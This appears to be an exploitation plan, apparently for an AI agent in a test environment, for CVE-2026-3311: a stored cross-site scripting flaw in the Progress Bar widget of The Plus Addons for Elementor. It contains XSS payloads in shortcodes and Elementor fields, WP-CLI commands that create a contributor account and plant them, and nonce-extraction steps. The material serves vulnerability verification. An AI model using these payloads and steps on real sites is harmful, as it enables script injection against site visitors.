The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce <= 6.4.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Progress Bar

This research plan targets CVE-2026-3311, a Stored Cross-Site Scripting (XSS) vulnerability in The Plus Addons for Elementor (up to version 6.4.9). The vulnerability exists because the "Progress Bar" widget/shortcode fails to sanitize or escape user-supplied attributes before rendering them.

1. Vulnerability Summary

• Vulnerability: Stored Cross-Site Scripting (XSS)
• Component: Progress Bar (Widget/Shortcode)
• Vulnerable Version: <= 6.4.9
• Sink: Direct echo or concatenation of widget settings/attributes without proper escaping (esc_html, esc_attr, or wp_kses).
• Source: Attributes provided via the Progress Bar shortcode or Elementor widget settings (e.g., title, prefix, suffix, or percentage_text).

2. Attack Vector Analysis

• Endpoint: wp-admin/post.php (for Elementor editing) or wp-admin/post-new.php (for shortcode insertion).
• Authentication: Contributor-level access or higher is required to create/edit posts.
• Payload Location: Inside a shortcode [tp_progress_bar] or within the Elementor JSON metadata (_elementor_data) for the tp-progress-bar widget.
• Preconditions: The plugin must be active, and the "Progress Bar" widget must be enabled in the plugin's dashboard.

3. Code Flow (Inferred)

1. Registration: The plugin registers the Progress Bar widget (likely in a file named modules/widgets/tp_progress_bar.php or similar, following the naming convention seen in tp_blog_listout.php).
2. Shortcode Handling: If triggered via shortcode, a callback function parses $atts.
3. Rendering:
   • In the render() method of the widget class, settings are retrieved via $this->get_settings_for_display().
   • In the shortcode callback, attributes are processed.
4. Vulnerable Sink: The code performs an operation similar to:
   echo '<span class="pb-title">' . $settings['title'] . '</span>';
   instead of:
   echo '<span class="pb-title">' . wp_kses_post( $settings['title'] ) . '</span>';

4. Nonce Acquisition Strategy

While the vulnerability is triggered by a shortcode (which typically doesn't require a nonce for frontend rendering), a Contributor needs a nonce to save the post initially.

1. Post Creation Nonce: Standard WordPress _wpnonce for post.php.
2. Elementor Heartbeat (if applicable): If the agent uses the Elementor Editor to inject the payload, it must extract the elementorCommonConfig nonce.
   • Tool: browser_navigate to wp-admin/post-new.php?post_type=page.
   • Tool: browser_eval("elementorCommonConfig.ajax.nonce").

Note: For a "shortcode" vulnerability, simply creating a post via WP-CLI with the malicious shortcode is the most direct path and bypasses the need for manual nonce extraction.

5. Exploitation Strategy

Step 1: Discover Shortcode Attributes

Since the exact attribute names are not in the provided source snippets, the agent should first confirm the shortcode name and attributes.

1. Execute: grep -r "add_shortcode" . in the plugin directory to find the "Progress Bar" shortcode tag.
2. Search for the callback function to identify attributes (e.g., title, label, symbol).

Step 2: Inject Payload (Shortcode Method)

Use the http_request tool (acting as a Contributor) or wp-cli to create a post containing the payload.

• Action: Create a post as a Contributor.
• Payload: [tp_progress_bar title='<img src=x onerror=alert("CVE-2026-3311")>']
  (Replace title with the actual attribute found in Step 1).

Step 3: Trigger Execution

• Navigate to the permalink of the newly created post using browser_navigate.
• Observe the browser for the alert or check the DOM for the unescaped <img> tag.

6. Test Data Setup

1. Plugin Activation: Ensure the-plus-addons-for-elementor-page-builder is active.
2. Contributor User:
   wp user create attacker attacker@example.com --role=contributor --user_pass=password123
3. Target Post:
   wp post create --post_type=post --post_status=publish --post_title="XSS Test" --post_content="[tp_progress_bar title='<script>alert(1)</script>']" --user=attacker

7. Expected Results

• The HTML source of the rendered page will contain the raw payload:
  <span class="..."><script>alert(1)</script></span>
• The browser will execute the script, confirming Stored XSS.

8. Verification Steps

1. CLI Check:
   wp post get $(wp post list --title="XSS Test" --field=ID) --field=post_content
   Verify the payload exists in the database.
2. Frontend Check:
   Use http_request to fetch the post URL and search for the literal string <script>alert(1)</script> in the response body.

9. Alternative Approaches

If the shortcode vector fails, target the Elementor widget configuration:

1. As a Contributor, open the Elementor editor for a page.
2. Add the Progress Bar widget.
3. Set the "Title" or "Label" field to <img src=x onerror=alert(document.domain)>.
4. Save the page and view the result.
5. Check wp_postmeta for the payload:
   wp post meta get <ID> _elementor_data (This will show the payload in a JSON-encoded string).

Specific Identifiers to Verify in Source (via grep)

• Widget Slug: tp-progress-bar (Likely in get_name() in the widget class).
• Shortcode Tag: Check for add_shortcode( calls.
• Localized JS Variable: If the plugin passes settings to JS, look for wp_localize_script calls involving tp-progress-bar. Based on other files, it might be something like theplus_progress_bar.